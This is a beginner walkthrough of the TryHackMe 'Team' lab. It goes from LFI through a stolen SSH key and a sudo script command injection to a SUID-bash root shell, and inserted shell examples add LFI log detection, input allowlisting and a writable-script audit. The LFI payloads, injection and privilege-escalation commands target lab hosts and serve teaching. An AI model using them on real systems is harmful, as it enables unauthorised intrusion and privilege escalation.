Full Walk-through (Beginner-Friendly Boot2Root)

Team is a beginner-friendly Boot2Root machine on TryHackMe that demonstrates a classic attack chain:
- LFI → Sensitive Data Disclosure → SSH Key Theft → User Pivot → Misconfigured Script → Root
This room is a great way to practice enumeration, privilege escalation, and chaining multiple vulnerabilities together.
Step 1 - Enumeration
As always, start with an Nmap scan to find open ports:
nmap -sC -sV -T4 -p- 10.10.245.208
Results:
21/tcp → FTP (vsftpd 3.0.5)
22/tcp → SSH (OpenSSH 8.2p1)
80/tcp → HTTP (Apache 2.4.41, default page)
Since port 80 was open, I launched Gobuster to find hidden directories:
gobuster dir -u http://10.10.245.208 -w /usr/share/wordlists/dirb/common.txt
Interesting results included hidden .ht* files and /server-status.
Step 2 - Discovering Virtual Hosts & LFI
When visiting the target on port 80, I was greeted with the default Apache2 Ubuntu page.
Checking the page source revealed a comment:
If you see this add 'team.thm' to your hosts file
So I added the host to my machine:
sudo nano /etc/hosts
# Add:
10.10.245.208 team.thm
Reloading http://team.thm showed a placeholder page under development, with a link to /dev/.
To access that, I added another subdomain to /etc/hosts:
sudo nano /etc/hosts
# Add:
10.10.245.208 team.thm dev.team.thm
Now http://dev.team.thm opened, where I found the vulnerable script:
script.php?page=
Testing for LFI
Using BurpSuite, I intercepted a request to script.php and replaced the page parameter with /etc/passwd:
http://dev.team.thm/script.php?page=/etc/passwd
And it worked: the server returned the contents of /etc/passwd.
This confirmed a Local File Inclusion vulnerability.
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
dale:x:1000:1000:anon,,,:/home/dale:/bin/bash
gyles:x:1001:1001::/home/gyles:/bin/bash
ftpuser:x:1002:1002::/home/ftpuser:/bin/sh
ftp:x:110:116:ftp daemon,,,:/srv/ftp:/usr/sbin/nologin
sshd:x:111:65534::/run/sshd:/usr/sbin/nologin
systemd-timesync:x:112:117:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
tss:x:113:120:TPM software stack,,,:/var/lib/tpm:/bin/false
tcpdump:x:114:121::/nonexistent:/usr/sbin/nologin
fwupd-refresh:x:115:122:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
usbmux:x:116:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
ssm-user:x:1003:1005::/home/ssm-user:/bin/sh
ubuntu:x:1004:1007:Ubuntu:/home/ubuntu:/bin/bash
Step 3 - Exploiting LFI with BurpSuite & Intruder
We already confirmed that the page= parameter in http://dev.team.thm/script.php?page=/etc/passwd is vulnerable to Local File Inclusion (LFI).
Reading /etc/passwd gave us a list of system accounts and real users:
dale, gyles, ubuntu, ssm-user, ftpuser
...but this is only the beginning. To escalate further, we need to hunt for more sensitive files: SSH keys, configs, logs, etc. Instead of testing them manually, we'll automate discovery with BurpSuite.
1. Capture the Request in Burp
1. Open BurpSuite and make sure your browser is configured to use Burp's proxy (127.0.0.1:8080).
2. Visit:
http://dev.team.thm/script.php?page=/etc/passwd
3. In Burp → Proxy tab → click Forward until you see the request in HTTP history.
4. Right-click the request → Send to Intruder.
2. Set Up Burp Intruder
1. In Intruder → Positions, highlight the value after page= (/etc/passwd).
2. Click Clear §, then highlight the payload (/etc/passwd) and click Add §.
Your request will now look like:
GET /script.php?page=§/etc/passwd§ HTTP/1.1
Host: dev.team.thm
3. Go to the Payloads tab.
4. Load a wordlist of common LFI targets. For example:
/usr/share/seclists/Fuzzing/LFI/LFI-gracefulsecurity-linux.txt
This list contains hundreds of sensitive Linux file paths: /etc/shadow, /root/.ssh/id_rsa, Apache configs, logs, etc.
3. Run the Attack
1. Click Start Attack.
2. Burp will try each file path in place of /etc/passwd.
3. Watch the Length and Response columns: if the length is significantly larger than the baseline (404 or "File not found"), the file was included successfully.
4. Example hits:
- /etc/ssh/sshd_config → contained Dale's private SSH key.
- /home/dale/.ssh/id_rsa (if accessible).
- /var/log/apache2/error.log (may reveal credentials).
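An Intruder run like this leaves a distinctive trace on the server side. The script below is an added example, not part of the original write-up: it scans constructed Apache access-log lines for page= values that carry an absolute path or a traversal sequence and reports which client sent them. The log lines and client IPs are made up for the example.

```shell
#!/bin/sh
# Added example: detect LFI probing against script.php?page= in an Apache
# access log. The log below is constructed; the IPs are placeholders.
LFI_SAMPLE_LOG=$(mktemp)
trap 'rm -f "$LFI_SAMPLE_LOG"' EXIT
cat > "$LFI_SAMPLE_LOG" <<'EOF'
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /script.php?page=home HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /script.php?page=/etc/passwd HTTP/1.1" 200 2714
10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /script.php?page=../../../../etc/ssh/sshd_config HTTP/1.1" 200 3300
10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /script.php?page=%2fetc%2fshadow HTTP/1.1" 200 100
10.0.0.9 - - [01/Jan/2024:10:00:05 +0000] "GET /script.php?page=..%2f..%2fetc%2fpasswd HTTP/1.1" 200 2714
10.0.0.5 - - [01/Jan/2024:10:00:06 +0000] "GET /index.html HTTP/1.1" 200 10918
EOF

# Print the suspicious request lines: page= followed by "/" or "%2f"
# (absolute path), or a value containing ".." / "%2e%2e" (traversal).
# Case-insensitive so %2F and %2E are caught as well.
lfi_hits() {
    grep -Ei 'page=(/|%2f)|page=[^ &]*(\.\.|%2e%2e)' "$1"
}

# Number of suspicious requests; a non-zero count is a good alert trigger.
lfi_hit_count() {
    lfi_hits "$1" | wc -l | tr -d ' '
}

# Suspicious requests per client IP, busiest first, so the fuzzing
# source stands out from normal visitors.
lfi_hits_by_ip() {
    lfi_hits "$1" | awk '{print $1}' | sort | uniq -c | sort -rn
}
```

Run against the real log with `lfi_hits_by_ip /var/log/apache2/access.log`; the 200 status on the hits is what distinguishes a successful inclusion from a mere attempt.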
4. Finding user.txt
While fuzzing, one of the payloads pointed us to a user flag. By adjusting the request, we could include:
http://dev.team.thm/script.php?page=/home/dale/user.txt
5. Example Discovery
From the Intruder attack, one of the most valuable results was:
/etc/ssh/sshd_config
Opening this via LFI showed:
AllowUsers dale gyles root ubuntu
And inside the comments: an OpenSSH private key for dale. Save it as dale_id_rsa on your attacker machine:
-----BEGIN OPENSSH PRIVATE KEY-----
*********************************************************
-----END OPENSSH PRIVATE KEY-----
This was the critical pivot - exporting the key allowed us to SSH into the box as dale.
Usage
- Save as dale_id_rsa:
nano dale_id_rsa
chmod 600 dale_id_rsa
Step 4 - Leaking Sensitive Files
Then I connected over SSH:
ssh -i dale_id_rsa dale@10.10.245.208
Dale → Gyles (Privilege Escalation #1)
Running sudo -l as dale showed:
(dale) NOPASSWD: /home/gyles/admin_checks
That meant I could run the script /home/gyles/admin_checks as gyles without a password.
Inspecting the script revealed:
read -p "Enter 'date' to timestamp the file: " error
$error 2>/dev/null
The user input ($error) was executed directly: a clear command injection.
So I exploited it:
sudo -u gyles /home/gyles/admin_checks
# When prompted:
id
uid=1001(gyles) gid=1001(gyles) groups=1001(gyles),108(lxd),1003(editors),1004(admin
Output confirmed execution as gyles.
I stabilized my shell:
script -qc /bin/bash /dev/null
Now I had my second user.
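The fix for admin_checks is to never execute the typed text at all. The functions below are an added example, not the room's script: unsafe_stamp reproduces the `$error 2>/dev/null` pattern (taking its input as an argument instead of read -p so it can be tested non-interactively), and safe_stamp only accepts the one word the prompt advertises.

```shell
#!/bin/sh
# Added example: the admin_checks prompt pattern next to a hardened version.
# Input arrives as $1 instead of via read -p so both can be exercised
# without a terminal.

# Vulnerable pattern: whatever was typed is run as a command, exactly as
# "$error 2>/dev/null" does in the original script. With sudo, that command
# runs as the target user.
unsafe_stamp() {
    error=$1
    $error 2>/dev/null
}

# Hardened: the input is compared against an allowlist and never expanded
# as a command. Only the literal word "date" is accepted, the binary is
# called by absolute path, and anything else is rejected with status 1.
safe_stamp() {
    case $1 in
        date) /bin/date ;;
        *)    printf 'rejected: %s\n' "$1" >&2; return 1 ;;
    esac
}
```

The same allowlist idea applies to any sudo NOPASSWD script: the script decides what runs, the caller only picks from a fixed menu.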
Gyles → Root (Privilege Escalation #2)
Checking id revealed gyles was in some interesting groups:
gyles : gyles lxd editors admin
The admin group looked promising.
I found a suspicious script:
ls -la /usr/local/bin/main_backup.sh
-rwxrwxr-x 1 root admin ...
Owned by root, group-owned by admin → gyles could modify it.
A quick search showed another script calling it:
grep -R "main_backup.sh" /opt/
/opt/admin_stuff/script.sh:main_site="/usr/local/bin/main_backup.sh"
So whenever root ran /opt/admin_stuff/script.sh, it would also execute main_backup.sh.
Since I could edit main_backup.sh, this was a perfect escalation point.
Step 5 - Exploiting main_backup.sh
I injected a payload to create a SUID root shell:
echo 'cp /bin/bash /tmp/rootbash && chmod +s /tmp/rootbash' >> /usr/local/bin/main_backup.sh
When /opt/admin_stuff/script.sh executed, it triggered my payload.
Now I had:
/tmp/rootbash -p
A full root shell!
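The root cause here is a script that root executes but that the admin group can write to. The audit script below is an added example, not from the write-up: it rebuilds the /opt/admin_stuff/script.sh → main_backup.sh layout under a throwaway temp directory and reports every .sh file the caller references that a non-owner could modify. The file contents and modes are constructed for the example; only the names come from the room.

```shell
#!/bin/sh
# Added example: find scripts called from a root-run script that are
# group- or world-writable. The layout is constructed under a temp dir.
AUDIT_DIR=$(mktemp -d)
trap 'rm -rf "$AUDIT_DIR"' EXIT
mkdir -p "$AUDIT_DIR/usr/local/bin" "$AUDIT_DIR/opt/admin_stuff"
printf '#!/bin/bash\necho backup\n' > "$AUDIT_DIR/usr/local/bin/main_backup.sh"
printf '#!/bin/bash\necho fine\n'   > "$AUDIT_DIR/usr/local/bin/helper.sh"
chmod 775 "$AUDIT_DIR/usr/local/bin/main_backup.sh"   # group-writable: the room's bug
chmod 755 "$AUDIT_DIR/usr/local/bin/helper.sh"        # only the owner can write: fine
cat > "$AUDIT_DIR/opt/admin_stuff/script.sh" <<EOF
#!/bin/bash
main_site="$AUDIT_DIR/usr/local/bin/main_backup.sh"
helper="$AUDIT_DIR/usr/local/bin/helper.sh"
\$main_site; \$helper
EOF

# Return 0 when the group (char 6) or other (char 9) permission bits of
# "ls -ld" output include write; only the first ten mode characters are read.
writable_by_others() {
    mode=$(ls -ld "$1" | cut -c1-10)
    case $mode in
        ?????w????|????????w?) return 0 ;;
        *) return 1 ;;
    esac
}

# Print every absolute path to a .sh file referenced by the given script
# that exists and that someone other than its owner could modify.
unsafe_script_deps() {
    grep -o '/[^ ";]*\.sh' "$1" | sort -u | while read -r dep; do
        [ -f "$dep" ] && writable_by_others "$dep" && echo "$dep"
    done
}
```

On a real host, run `unsafe_script_deps` over every script named in root's crontab and systemd timers; any path it prints is a privilege-escalation route, and the fix is `chmod 755` plus ownership by root.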
Conclusion
This room chained several classic vulnerabilities together:
- LFI exploitation,
- key disclosure,
- sudo misconfig,
- insecure script permissions.
They all led us from a web vulnerability to full system compromise.
That's how I rooted the Team machine.
Happy Hacking! Until the next write up :)